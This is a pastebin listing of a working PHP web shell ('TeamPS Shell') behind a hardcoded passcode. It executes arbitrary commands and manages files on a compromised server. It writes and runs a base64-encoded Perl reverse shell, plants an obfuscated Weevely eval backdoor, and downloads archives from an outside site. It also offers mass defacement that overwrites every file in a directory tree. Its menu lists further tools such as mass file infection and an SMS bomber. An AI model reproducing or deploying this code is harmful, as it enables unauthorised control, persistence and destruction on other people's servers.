· 9 years ago · Nov 07, 2016, 02:00 PM
1<?php
2
3session_start();
4if(!$_SESSION['_chk_allowed']) {
5 // sha1, and random bytes to thwart timing attacks. Not meant as secure hashing.
6$if = 'dxdiag';
7 $t = bin2hex(openssl_random_pseudo_bytes(10));
8 if($_POST['p'] && sha1($t.$_POST['p']) === sha1($t.$if)) {
9 $_SESSION['_chk_allowed'] = true;
10 header('Location: ?logout=0');
11 }
12 echo '<html><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-8"><title>-|| Mrdxdiag ||-</title><body background=http://cdn.paper4pc.com/images/women-smoke-men-couple-grayscale-monochrome-wallpaper-1.jpg><font color=white><form action=? method=post>Passcode : <input type=password name=p /><br/></form></font></body></html>';
13 exit;
14
15}
16if ($_GET['logout'] == '1'){
17 session_start();
18
19 $helper = array_keys($_SESSION);
20 foreach ($helper as $key){
21 unset($_SESSION[$key]);
22 }
23}
24?>
25<?php
26//TeamPS Shell
27//By Plum & KrypTiK
28error_reporting(0);
29#chdir('');
30//Some basic var's
31if (!@$_GET['path']) {
32 $dir = CleanDir(getcwd());
33} else {
34 $dir = CleanDir($_GET['path']);
35}
36$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
37$domain = $_SERVER['HTTP_HOST'];
38$script = $_SERVER['SCRIPT_NAME'];
39$full_url = $_SERVER['REQUEST_URI'];
40$script2 = basename($script);
41$serverip = $_SERVER['SERVER_ADDR'];
42$userip = $_SERVER['REMOTE_ADDR'];
43$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
44$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
45$disabled = ini_get('disable_functions');
46//Perl back connect script by LorD
47//Encoded in base64 for convenience
48$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
49@ini_set("memory_limit", "9999M");
50@ini_set("max_execution_time", "0");
51@ini_set("upload_max_filesize", "9999m");
52@ini_set("magic_quotes_gpc", "0");
53@set_magic_quotes_runtime(0);
54set_time_limit(0);
55if (empty($disabled)) {
56 $disabled = "None";
57}
58//Some functions
59function CleanDir($directory) {
60 $directory = str_replace("\\", "/", $directory);
61 $directory = str_replace("//", "/", $directory);
62 return $directory;
63}
64function success($for, $var1) {
65 $domain = $_SERVER['HTTP_HOST'];
66 $script = $_SERVER['SCRIPT_NAME'];
67 $full_url = $_SERVER['REQUEST_URI'];
68 if ($for == "filesave") {
69 $message = "File Saved!";
70 $redirect = "http://$domain$script?path=$var1";
71 }
72 if ($for == "filedelete") {
73 $message = "File Deleted!";
74 $redirect = "http://$domain$script?path=$var1";
75 }
76 if ($for == "createdir") {
77 $message = "Directory Created!";
78 $redirect = "http://$domain$script?path=$var1";
79 }
80 if ($for == "dir_exists") {
81 $message = "Directory Already Exists!";
82 $redirect = "http://$domain$script?path=$var1";
83 }
84 if ($for == "file_exists") {
85 $message = "File Already Exists!";
86 $redirect = "http://$domain$script?editfile=$var1";
87 }
88 if ($for == "file_created") {
89 $message = "File Created!";
90 $redirect = "http://$domain$script?editfile=$var1";
91 }
92 if ($for == "file_uploaded") {
93 $message = "File Uploaded!";
94 $redirect = "http://$domain$full_url";
95 }
96 if ($for == "shell_killed") {
97 $message = "Shell Killed!";
98 $redirect = "http://$domain$script";
99 }
100 if ($for == "dir_del") {
101 $message = "Directory Deleted!";
102 $redirect = "http://$domain$script?path=$var1";
103 }
104 if ($for == "dir_renamed") {
105 $message = "Directory Renamed!";
106 $redirect = "http://$domain$script?path=$var1";
107 }
108 if ($for == "file_renamed") {
109 $message = "File Renamed!";
110 $redirect = "http://$domain$script?path=$var1";
111 }
112 if ($for == "configs_found") {
113 $message = "$var1 Configs Found!";
114 $redirect = "";
115 }
116 if ($for == "unzip") {
117 $message = "Successfully Unzipped File!";
118 $redirect = "http://$domain$script?path=$var1";
119 }
120 if ($for == "files_found") {
121 $message = "$var1 files found!";
122 $redirect = "";
123 }
124 if ($for == "weevely") {
125 $message = "Weevely BackDoor Installed!";
126 $redirect = "";
127 }
128 echo "<div id='xbox'><embed
129 src='http://p0wersurge.com/js/achievementnopic.swf'
130 width='300'
131 height='80'
132 flashvars='Text=$message&gs=1337'
133 wmode='transparent'/></div>";
134 if (empty($redirect)) {
135 echo "<script>
136function remove (){
137 document.getElementById('xbox').innerHTML='';
138}
139setInterval(function(){remove();}, 2700);
140</script>";
141 } else {
142 echo "<script>
143function remove (){
144 window.location = '$redirect'
145}
146setInterval(function(){remove();}, 2500);
147</script>";
148 }
149}
150function error($mesg) {
151 $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
152 echo "$error";
153}
154function ByteConversion($bytes, $precision = 2) {
155 $kilobyte = 1024;
156 $megabyte = $kilobyte * 1024;
157 $gigabyte = $megabyte * 1024;
158 $terabyte = $gigabyte * 1024;
159 if (($bytes >= 0) && ($bytes < $kilobyte)) {
160 return $bytes . ' B';
161 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
162 return round($bytes / $kilobyte, $precision) . ' KB';
163 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
164 return round($bytes / $megabyte, $precision) . ' MB';
165 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
166 return round($bytes / $gigabyte, $precision) . ' GB';
167 } elseif ($bytes >= $terabyte) {
168 return round($bytes / $terabyte, $precision) . ' TB';
169 } else {
170 return $bytes . ' B';
171 }
172}
173//Mass File Function
174function files($mass_dir) {
175 if ($dh = opendir($mass_dir)) {
176 $files = array();
177 $inner_files = array();
178 while ($file = readdir($dh)) {
179 if ($file != "." && $file != ".." && $file[0] != '.') {
180 if (is_dir($mass_dir . "/" . $file)) {
181 $inner_files = files("$mass_dir/$file");
182 if (is_array($inner_files)) $files = array_merge($files, $inner_files);
183 } else {
184 array_push($files, "$mass_dir/$file");
185 }
186 }
187 }
188 closedir($dh);
189 return $files;
190 }
191}
192//Execute command
193function cmd2($cmd, $path) {
194 chdir($path);
195 $disabled = ini_get('disable_functions');
196 if (empty($disabled)) {
197 $disabled = "None";
198 }
199 if ($disabled == "None") {
200 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
201 while (!feof($io[1])) {
202 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
203 }
204 while (!feof($io[2])) {
205 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
206 }
207 fclose($io[1]);
208 fclose($io[2]);
209 proc_close($execute);
210 return $res;
211 } elseif (function_exists("proc_open")) {
212 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
213 while (!feof($io[1])) {
214 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
215 }
216 while (!feof($io[2])) {
217 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
218 }
219 fclose($io[1]);
220 fclose($io[2]);
221 proc_close($execute);
222 return $res;
223 } elseif (function_exists("exec")) {
224 $res = exec($cmd);
225 return $res;
226 } elseif (function_exists("system")) {
227 $res = system($cmd);
228 return $res;
229 } elseif (function_exists("shell_exec")) {
230 $res = shell_exec($cmd);
231 return $res;
232 } elseif (function_exists("passthru")) {
233 $res = passthru($cmd);
234 return $res;
235 } else {
236 error("The necessary functions to execute commands are disabled!");
237 }
238}
239//Salt generator
240function gen_salt($length) {
241 $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
242 $i = 0;
243 $salt = "";
244 while ($i < $length) {
245 $arrand = array_rand($characters, 1);
246 $salt.= $characters[$arrand];
247 $i++;
248 }
249 return $salt;
250}
251//Unzip function
252function unzip($filename, $directory) {
253 $zip = new ZipArchive;
254 $res = $zip->open($filename);
255 if ($res === TRUE) {
256 $zip->extractTo($directory);
257 $zip->close();
258 success("unzip", $directory);
259 } else {
260 cmd2("unzip $filename", $directory);
261 }
262}
263//Get files and directories and throw them into an array.
264$open = opendir($dir);
265$files = array();
266$direcs = array();
267while ($file = readdir($open)) {
268 if ($file != "." && $file != "..") {
269 if (is_dir("$dir/$file")) {
270 array_push($direcs, $file);
271 } else {
272 array_push($files, $file);
273 }
274 }
275}
276asort($direcs);
277asort($files);
278//echo out header
279echo "<pre>
280<center>
281<font size='2' color='#14ab00'><pre>
282 _/ _/ _/ _/_/_/ _/ _/ _/
283 _/_/_/ _/_/ _/_/ _/ _/_/ _/ _/ _/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/
284 _/_/ _/ _/ _/ _/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/_/
285 _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/
286_/_/_/ _/ _/ _/ _/_/_/ _/ _/ _/_/_/ _/ _/_/_/ _/_/_/ _/_/_/
287 _/ _/ _/
288 _/_/
289
290<a class ='navbar' href='http://p0wersurge.com'>p0wersurge</a> ©2012 Plum & KrypTiK
291 </pre>
292</font>
293</center>
294</pre>";
295//echo out system info misc bar
296echo "<table border='1' width='100%'>
297<tr>
298<th>User</th>
299<th>System</th>
300<th>Server Software</th>
301<th>safe_mode</th>
302<th>open_basedir</th>
303<th>Disable Functions</th>
304<th>Your IP</th>
305<th>Server IP</th>
306</tr>";
307$system = php_uname();
308$software = $_SERVER['SERVER_SOFTWARE'];
309if (strpos($software, "Win") != FALSE) {
310 $whoami = strstr($whoami, "\\");
311 $whoami = substr($whoami, 1);
312}
313$safemode = ini_get('safe_mode');
314if ($safemode) {
315 $safemode = "Enabled";
316} else {
317 $safemode = "Disabled";
318}
319$openbase = ini_get('open_basedir');
320if ($openbase) {
321 $openbase = "Enabled";
322} else {
323 $openbase = "Disabled";
324}
325echo "<tr>
326<td>$whoami</td>
327<td>$system</td>
328<td>$software</td>
329<td>$safemode</td>
330<td>$openbase</td>
331<td>$disabled</td>
332<td>$userip</td>
333<td>$serverip</td>
334</tr>
335</table>
336<br>";
337//Navbar will go here.
338//Basic for now
339echo "<center><font size='4' color='#14ab00'><b>
340[~<a href='http://$domain$script' class='navbar'>Home</a>~]
341[~<a href='http://$domain$script?installMySQL' class='navbar'>Install MSD</a>~]
342[~<a href='http://$domain$script?massdeface' class='navbar'>Mass Deface</a>~]
343[~<a href='http://$domain$script?massinfect' class='navbar'>Mass File Infect</a>~]
344[~<a href='http://$domain$script?config' class='navbar'>Config Finder</a>~]
345[~<a href='http://$domain$script?search' class='navbar'>File Search</a>~]
346[~<a href='http://$domain$script?encrypt' class='navbar'>Encrypt String</a>~]
347[~<a href='http://$domain$script?kill' class='navbar'>Kill</a>~]<br>
348</font>
349<font size='3.5' color='#14ab00'>
350[~<a href='http://$domain$script?sms' class='navbar'>SMS Bomber</a>~]
351[~<a href='http://$domain$script?domaininfo' class='navbar'>Domain Information</a>~]
352[~<a href='http://$domain$script?back' class='navbar'>Back Connect</a>~]
353[~<a href='http://$domain$script?weev' class='navbar'>Weevely Backdoor</a>~]
354[~<a href='http://$domain$script?symlink' class='navbar'>Symlink</a>~]
355[~<a href='http://$domain$script?scan' class='navbar'>Port Scan</a>~]
356</b></font></center><br>";
357//End navbar
358//Anything you want echo'd out between misc system bar
359//and misc file bar put below here!
360//Back connect
361if (isset($_GET['back'])) {
362 echo "
363 <form method='POST'>
364 <center>
365 <font color='#14ab00'>
366 IP: <input type='text' class='text' name='ip' value='$userip' />
367 Port: <input type='text' class='text' name='port' value='2121' size='3'/><br>
368 <input type='submit' name='backC' value='Connect' />
369 </font>
370 </center>
371 </form>
372 ";
373 if (isset($_POST['backC'])) {
374 $port = $_POST['port'];
375 $bcip = $_POST['ip'];
376 $bc_decode = base64_decode($bcperl_source);
377 if (is_dir('/tmp')) {
378 if (file_put_contents("/tmp/bc.pl", $bc_decode)) {
379 $bc_command = "perl /tmp/bc.pl $bcip $port";
380 cmd2($bc_command, $dir);
381 echo "<center><font color='#14ab00' size='3'>Trying to connect!</font></center><br>";
382 } else {
383 error("Failed to write perl script to /tmp!");
384 }
385 } elseif (is_writeable($dir)) {
386 if (file_put_contents("$dir/bc.pl", $bc_decode)) {
387 $bc_command = "perl $dir/bc.pl $bcip $port";
388 cmd2($bc_command, $dir);
389 echo "<center><font color='#14ab00' size='3'>Trying to connect!</font></center><br>";
390 } else {
391 error("Failed to write perl script to $dir!");
392 }
393 } else {
394 error("/tmp does not exist and current directory is not writable!");
395 }
396 }
397}
398//Weevely backdoor
399if (isset($_GET['weev'])) {
400 echo "<center><font color='#14ab00' size='3'>
401<form action='' method='post'>
402Directory to install weevely backdoor:<br>
403<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
404Name of file (something .php):<br>
405<input type='text' name='weev_name' class='text' value='weevely.php'><br>
406Password (more than 3 characters):<br>
407<input type='text' name='weev_pass' class='text'><br>
408<input type='submit' name='install_weev' value='BackDoor'><br>
409</font>
410</center>";
411}
412if (isset($_POST['install_weev'])) {
413 $weevdir = rtrim($_POST['weev_dir'], '/');;
414 $weevname = $_POST['weev_name'];
415 $weevpassword = $_POST['weev_pass'];
416 if (strlen($weevpassword) < 3) {
417 error("Password must be longer than 3 characters!");
418 } else {
419 $first2 = $weevpassword[0] . $weevpassword[1];
420 $rest = substr($weevpassword, 2);
421 $money = "$";
422 $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
423 $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
424 $weevelybd3 = "$money" . "k='$rest';";
425 $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
426 $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
427 if (file_put_contents($weevdir . '/' . $weevname, $all)) {
428 echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
429 success("weevely");
430 } else {
431 error("Failed to write backdoor to $weevdir");
432 }
433 }
434}
435//Edit file stuff
436if (!empty($_GET['editfile'])) {
437 $edfile = $_GET['editfile'];
438 $redirectloc = dirname($edfile);
439 echo "<form method='POST'><center>";
440 if (file_exists($edfile)) {
441 if (get_magic_quotes_gpc()) {
442 $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
443 } else {
444 $file_content = htmlspecialchars(file_get_contents($edfile));
445 }
446 if (is_writeable($edfile)) {
447 echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#000000'>$file_content</textarea>
448<br><br>
449 <input type='submit' name='savedit' value='Save' />
450 <input type='submit' name='deletefile' value='Delete' />
451 </form></center>";
452 if (isset($_POST['savedit'])) {
453 if (get_magic_quotes_gpc()) {
454 $edfilecontent = stripslashes($_POST['edfile_contents']);
455 } else {
456 $edfilecontent = $_POST['edfile_contents'];
457 }
458 if (file_put_contents($edfile, $edfilecontent)) {
459 success("filesave", rtrim($redirectloc, "/"));
460 } else {
461 error("Failed to save file!");
462 }
463 } else if (isset($_POST['deletefile'])) {
464 if (unlink($edfile)) {
465 success("filedelete", rtrim($redirectloc, '/'));
466 } else {
467 error("Failed to delete file!");
468 }
469 }
470 } else {
471 echo "<font color='red'><b>File is read only!</b></font><br>
472<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
473 }
474 echo "</center>";
475 } else {
476 echo "<form method='POST'><center>";
477 echo "<font color='red'><b>File does not exist!</b></font><br>
478<textarea rows='20' cols='150' name='newfile_contents' style='color:#000'>
479</textarea><br><br>
480 <input type='submit' name='savefile' value='Create File' /><br /><br />
481 </form></center>";
482 if (isset($_POST['savefile'])) {
483 if (get_magic_quotes_gpc()) {
484 $newfilecontent = stripslashes($_POST['newfile_contents']);
485 } else {
486 $newfilecontent = $_POST['newfile_contents'];
487 }
488 if (file_put_contents($edfile, $newfilecontent)) {
489 success("filesave", rtrim($redirectloc, "/"));
490 } else {
491 error("Failed to save file!");
492 }
493 }
494 }
495}
496//Make directory stuff
497if (isset($_POST['do_create_dir'])) {
498 $cdir = $_POST['create_dir'];
499 if (is_dir($cdir)) {
500 success("dir_exists", $cdir);
501 } else {
502 if (mkdir($cdir, 0777)) {
503 success("createdir", $cdir);
504 } else {
505 error("Directory was not created!");
506 }
507 }
508}
509//Make file stuff
510if (isset($_POST['do_create_file'])) {
511 $cfile = $_POST['create_file'];
512 if (file_exists($cfile)) {
513 success("file_exists", $cfile);
514 } else {
515 if (fopen($cfile, "w+")) {
516 success("file_created", $cfile);
517 } else {
518 error("File was not created");
519 }
520 }
521}
522//Go directory
523if (isset($_POST['do_go_dir'])) {
524 $godir = $_POST['go_dir'];
525 echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
526}
527//Go Edit file
528if (isset($_POST['do_go_edit'])) {
529 $gefile = $_POST['go_edit_file'];
530 if (file_exists($gefile)) {
531 header("Location: http://$domain$script?editfile=$gefile");
532 } else {
533 error("File does not exist!");
534 }
535}
536//Upload File
537if (isset($_POST['do_upload_file'])) {
538 $udir = $_POST['upload_location'];
539 $uname = $_FILES['upload_file']['name'];
540 $both = "$udir$uname";
541 if (file_exists($both)) {
542 success("file_exists", $both);
543 } else {
544 switch ($_FILES['upload_file']['error']) {
545 case 0:
546 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
547 success("file_uploaded");
548 } else {
549 error("Failed To Upload File!");
550 }
551 }
552 }
553}
554//Kill Shell
555if (isset($_GET['kill'])) {
556 if (unlink("$dir/$script2")) {
557 success("shell_killed");
558 } else {
559 error("Failed to kill shell!");
560 }
561}
562//Install MySQL Tool
563if (isset($_GET['installMySQL'])) {
564 echo "<center>
565<font size='4'>
566<a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
567<br>
568<br>
569<a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
570</font>
571</center>
572<br>";
573}
574//MSD 1 stuff
575if (isset($_GET['msd1'])) {
576 echo "<center>
577<font color='#14ab00' size='3'>
578Directory to install to:<br>
579If directory does not exist it will attempt to create it.
580<form action='' method='post'>
581<input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
582<input type='submit' name='installmsd1' value='Install'>
583<form>
584</font>
585</center>
586<br>";
587}
588if (isset($_POST['installmsd1'])) {
589 $msd1dir = rtrim($_POST['msd1dir'], "/");
590 $msd1dir2 = "$msd1dir/msdv2.zip";
591 if (!is_dir($msd1dir)) {
592 if (!mkdir($msd1dir, 0777)) {
593 error("Failed to make directory $msd1dir");
594 }
595 }
596 $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
597 if (file_put_contents($msd1dir2, $link)) {
598 unzip($msd1dir2, $msd1dir);
599 } else {
600 error("Could not write to $msd1dir");
601 }
602}
603//MSD 2 stuff
604if (isset($_GET['msd2'])) {
605 echo "<center>
606<font color='#14ab00' size='3'>
607Directory to install to:<br>
608If directory does not exist it will attempt to create it.
609<form action='' method='post'>
610<input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
611<input type='submit' name='installmsd2' value='Install'>
612<form>
613</font>
614</center>
615<br>";
616}
617if (isset($_POST['installmsd2'])) {
618 $msd2dir = rtrim($_POST['msd2dir'], "/");
619 $msd2dir2 = "$msd2dir/msd.zip";
620 if (!is_dir($msd2dir)) {
621 if (!mkdir($msd2dir, 0777)) {
622 error("Failed to make directory $msd2dir");
623 }
624 }
625 $link = file_get_contents("http://p0wersurge.com/msd.zip");
626 if (file_put_contents($msd2dir2, $link)) {
627 unzip($msd2dir2, $msd2dir);
628 } else {
629 error("Could not write to $msd2dir");
630 }
631}
632//Delete Directory
633if (isset($_GET['deldir'])) {
634 $deldir = $_GET['deldir'];
635 $redir = dirname($deldir);
636 if (rmdir($deldir)) {
637 success("dir_del", rtrim($redir, '/'));
638 } else {
639 error("Failed to delete directory!");
640 }
641}
642//Rename Directory
643if (isset($_GET['rendir'])) {
644 $rendir = $_GET['rendir'];
645 $dend = $_GET['old'];
646 echo "<center>
647<form action='' method='post'>
648<input type='text' class='text' name='new_dir_name' value='$dend'>
649<input type='submit' name='do_rename_dir' value='Rename'>
650</center>";
651}
652if (isset($_POST['do_rename_dir'])) {
653 $newdir = $_POST['new_dir_name'];
654 $rendir = $_GET['rendir'];
655 $dend = $_GET['old'];
656 if (rename("$rendir/$dend", "$rendir/$newdir")) {
657 success("dir_renamed", $rendir);
658 } else {
659 error("Directory was not renamed!");
660 }
661}
662//Delete file
663if (isset($_GET['delfile'])) {
664 $delfile = $_GET['delfile'];
665 $redir = dirname($delfile);
666 if (unlink($delfile)) {
667 success("filedelete", rtrim($redir, '/'));
668 } else {
669 error("Failed to delete file!");
670 }
671}
672//Rename File
673if (isset($_GET['renfile'])) {
674 $renfile = $_GET['renfile'];
675 $fend = $_GET['old'];
676 echo "<center>
677<form action='' method='post'>
678<input type='text' class='text' name='new_file_name' value='$fend'>
679<input type='submit' name='do_rename_file' value='Rename'>
680</center>";
681}
682if (isset($_POST['do_rename_file'])) {
683 $newfile = $_POST['new_file_name'];
684 $renfile = $_GET['renfile'];
685 $fend = $_GET['old'];
686 if (rename("$renfile/$fend", "$renfile/$newfile")) {
687 success("file_renamed", $renfile);
688 } else {
689 error("File was not renamed!");
690 }
691}
692//Mass Files Stuff
693if (isset($_POST['mass_files'])) {
694 $action = $_POST['mass_action'];
695 $chmodvalue = $_POST['chmod_value'];
696 $box = $_POST['delbox'];
697 if ($action == "Delete") {
698 foreach ($box as $b) {
699 if (is_dir($b)) {
700 if (rmdir($b)) {
701 echo "<font color='green'>Deleted Directory: $b</font><br>";
702 } else {
703 echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
704 }
705 } else {
706 if (unlink($b)) {
707 echo "<font color='green'>Deleted File: $b</font><br>";
708 } else {
709 echo "<font color='red'>Failed To Delete file: $b</font><br>";
710 }
711 }
712 }
713 }
714 if ($action == "chmod") {
715 foreach ($box as $b) {
716 if (is_dir($b)) {
717 if (chmod($b, $chmodvalue)) {
718 echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
719 } else {
720 echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
721 }
722 } else {
723 if (chmod($b, $chmodvalue)) {
724 echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
725 } else {
726 echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
727 }
728 }
729 }
730 }
731}
732//Mass Defacer
733if (isset($_POST['do_mass_deface'])) {
734 if (get_magic_quotes_gpc()) {
735 $mass_source = stripslashes($_POST['massdeface_source']);
736 } else {
737 $mass_source = $_POST['massdeface_source'];
738 }
739 $def_dir = $_POST['deface_dir'];
740 $custom_dir = $_POST['custom_dir'];
741 $custom_dir = rtrim($custom_dir, "/");
742 $failed = 0;
743 $success = 0;
744 if (empty($mass_source)) {
745 error("You must enter a source!");
746 } elseif (empty($custom_dir) && $def_dir == "custom") {
747 error("You must enter a custom directory when using the Custom option!");
748 } else {
749 if ($def_dir == "root") {
750 $mddir = $rootdir;
751 }
752 if ($def_dir == "custom") {
753 $mddir = $custom_dir;
754 }
755 foreach (files($mddir) as $key => $file) {
756 $file2 = trim($file, ".");
757 if ("$file2" == "$dir/$script2") {
758 echo "";
759 } else {
760 if (file_put_contents("$file2", $mass_source)) {
761 echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
762 $success++;
763 } else {
764 echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
765 $failed++;
766 }
767 }
768 }
769 echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
770 }
771}
772if (isset($_GET['massdeface'])) {
773 echo "<center>
774<font color='#14ab00'>
775<form action='' method='post'>
776Directory to start deface from:<br>
777<select name='deface_dir'>
778<option value='root'>Root</option>
